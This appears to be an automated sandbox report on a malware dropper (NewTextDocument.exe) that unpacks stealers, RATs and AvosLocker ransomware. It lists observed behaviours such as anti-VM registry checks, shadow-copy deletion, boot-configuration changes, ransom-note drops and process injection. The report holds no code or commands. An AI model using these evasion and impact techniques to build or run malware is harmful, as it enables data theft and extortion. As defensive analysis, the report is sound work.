Malware Analysis Report

2024-10-16 03:27

Sample ID: 240909-ktwyhazfjr
Target: NewTextDocument.exe
SHA256: 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
Tags: agenttesla amadey avoslocker lumma redline sectoprat stealc vidar c7817d deepweb default logsdiller cloud (tg: @logsdillabot) rave defense_evasion discovery evasion execution impact infostealer keylogger persistence ransomware rat spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

Threat Level: Known bad

The file NewTextDocument.exe was found to be: Known bad.

Malicious Activity Summary

Avoslocker Ransomware

Lumma Stealer, LummaC

Amadey

RedLine

SectopRAT payload

RedLine payload

Vidar

Detect Vidar Stealer

SectopRAT

AgentTesla

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Deletes shadow copies

Renames multiple (7760) files with added filename extension

Downloads MZ/PE file

Creates new service(s)

Stops running service(s)

Executes dropped EXE

Checks computer location settings

Checks BIOS information in registry

Identifies Wine through registry keys

Drops desktop.ini file(s)

Power Settings

Enumerates connected drives

Checks installed software on the system

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Drops file in Program Files directory

Launches sc.exe

Embeds OpenSSL

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Delays execution with timeout.exe

Checks processor information in registry

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-09-09 08:54

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-09-09 08:54

Reported: 2024-09-09 08:56

Platform: win10v2004-20240802-en

Max time kernel: 18s

Max time network: 151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Amadey

trojan amadey

Avoslocker Ransomware

ransomware avoslocker

Detect Vidar Stealer

stealer
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Lumma Stealer, LummaC

stealer lumma

RedLine

infostealer redline

RedLine payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Stealc

stealer stealc

Vidar

stealer vidar

Deletes shadow copies

ransomware defense_evasion impact execution

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\fugu.exe | N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (7760) files with added filename extension

ransomware

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\fugu.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\fugu.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A

Identifies Wine through registry keys

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\fugu.exe | N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A

AutoIT Executable

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\fugu.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\pt-BR.pak.DATA | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\adcvbs.inc | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\pt-br\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\fonts\symbol.ttf | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Java\jre-1.8\lib\ext\sunmscapi.jar | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\acrobat_pdf.svg | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Windows Media Player\uk-UA\wmpnssui.dll.mui | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Windows Media Player\uk-UA\wmpnssci.dll.mui | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007 | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-16.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8ES.LEX | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files\Reference Assemblies\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Mozilla Firefox\defaultagent.ini | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\BLUEPRNT.ELM | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-180.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\main.css | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\DenyExpand.php | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\GR8GALRY.GRA | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Common Files\Microsoft Shared\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\EQUATION\1033\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-180.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\css\main.css | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Media Player\de-DE\wmplayer.exe.mui | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\bn-IN.pak | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\vi.pak | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\rhp_world_icon_hover.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\custom_poster.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\WinFXList.xml | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\bun.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL012.XML | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\System\ado\msado60.tlb | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\index.win32.bundle.map | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-il\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files\VideoLAN\VLC\lua\modules\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PG_INDEX.XML | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL112.XML | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\office.core.operational.js | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Google\Update\Offline\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\GET_YOUR_FILES_BACK.txt | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoInternetConnection_120x80.svg | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-64_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Grace-ul-oob.xrm-ms | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A

Launches sc.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\sc.exe | N/A
N/A | N/A | C:\Windows\system32\sc.exe | N/A
N/A | N/A | C:\Windows\system32\sc.exe | N/A
N/A | N/A | C:\Windows\system32\sc.exe | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Embeds OpenSSL

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\v.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\l.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\fugu.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\s.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\fugu.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\fugu.exe | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\a\AvosLocker.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2652 wrote to memory of 2948 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
PID 2652 wrote to memory of 2948 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\pclient.exe
PID 2652 wrote to memory of 3748 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\s.exe
PID 2652 wrote to memory of 3748 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\s.exe
PID 2652 wrote to memory of 3748 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\s.exe
PID 2652 wrote to memory of 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\v.exe
PID 2652 wrote to memory of 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\v.exe
PID 2652 wrote to memory of 3260 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\v.exe
PID 2652 wrote to memory of 4068 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\l.exe
PID 2652 wrote to memory of 4068 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\l.exe
PID 2652 wrote to memory of 4068 | N/A | C:\Users\Admin\AppData\Local\Temp\NewTextDocument.exe | C:\Users\Admin\AppData\Local\Temp\a\l.exe
PID 3748 wrote to memory of 4240 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 4240 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 4240 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3748 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\a\s.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3260 wrote to memory of 2880 | N/A | C:\Users\Admin\AppData\Local\Temp\a\v.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
